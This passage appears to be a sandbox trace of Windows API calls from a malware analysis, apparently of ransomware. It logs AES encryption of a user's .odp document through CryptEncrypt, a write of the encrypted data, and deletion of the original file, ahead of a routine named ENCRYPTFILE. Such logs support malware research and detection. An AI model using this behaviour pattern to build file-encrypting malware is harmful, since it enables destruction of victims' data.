hHeap=0x1780000) returned 1 [0082.122] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadba) returned 0x499a008 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.122] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.123] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.123] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadba) returned 0x499a008 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a40 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a10 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb090 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadba) returned 0x49afb98 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.124] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.125] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.125] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e29c0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e29c0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0082.125] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c36e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.126] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xadba, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xadc0) returned 1 [0082.126] CharLowerBuffW (in: lpsz="byte[44481]", cchLength=0xb | out: lpsz="byte[44481]") returned 0xb [0082.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.127] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ba960*, pdwDataLen=0x144e088*=0xadba, dwBufLen=0xadc0 | out: pbData=0x49ba960*, pdwDataLen=0x144e088*=0xadc0) returned 1 [0082.127] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.129] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xadc0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ea8c*=0xadc0, lpOverlapped=0x0) returned 1 [0082.130] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb318, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.130] CryptDestroyKey (hKey=0x41ac180) returned 1 [0082.130] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.131] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.131] CryptReleaseContext (hProv=0x41a4040, dwFlags=0x0) returned 1 [0082.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.131] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.131] CloseHandle (hObject=0x298) returned 1 [0082.131] CloseHandle (hObject=0x258) returned 1 [0082.153] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp", lpFilePart=0x0) returned 0x45 [0082.154] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\rar_tjixyd14cwjz.odp")) returned 0x20 [0082.154] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e98cd0, ftCreationTime.dwHighDateTime=0x1d5e5de, ftLastAccessTime.dwLowDateTime=0xc53e63e0, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xc53e63e0, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xadba, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="rar_tJIXYd14cWJz.odp", cAlternateFileName="RAR_TJ~1.ODP")) returned 0x41ac500 [0082.154] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\rar_tjixyd14cwjz.odp")) returned 1 [0082.157] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e98cd0, ftCreationTime.dwHighDateTime=0x1d5e5de, ftLastAccessTime.dwLowDateTime=0xc53e63e0, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xc53e63e0, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xadba, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="rar_tJIXYd14cWJz.odp", cAlternateFileName="RAR_TJ~1.ODP")) returned 0 [0082.157] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0082.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0082.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0082.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0082.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0082.158] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0082.158] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0082.158] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.158] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0082.158] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0082.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0082.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43e87e8 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 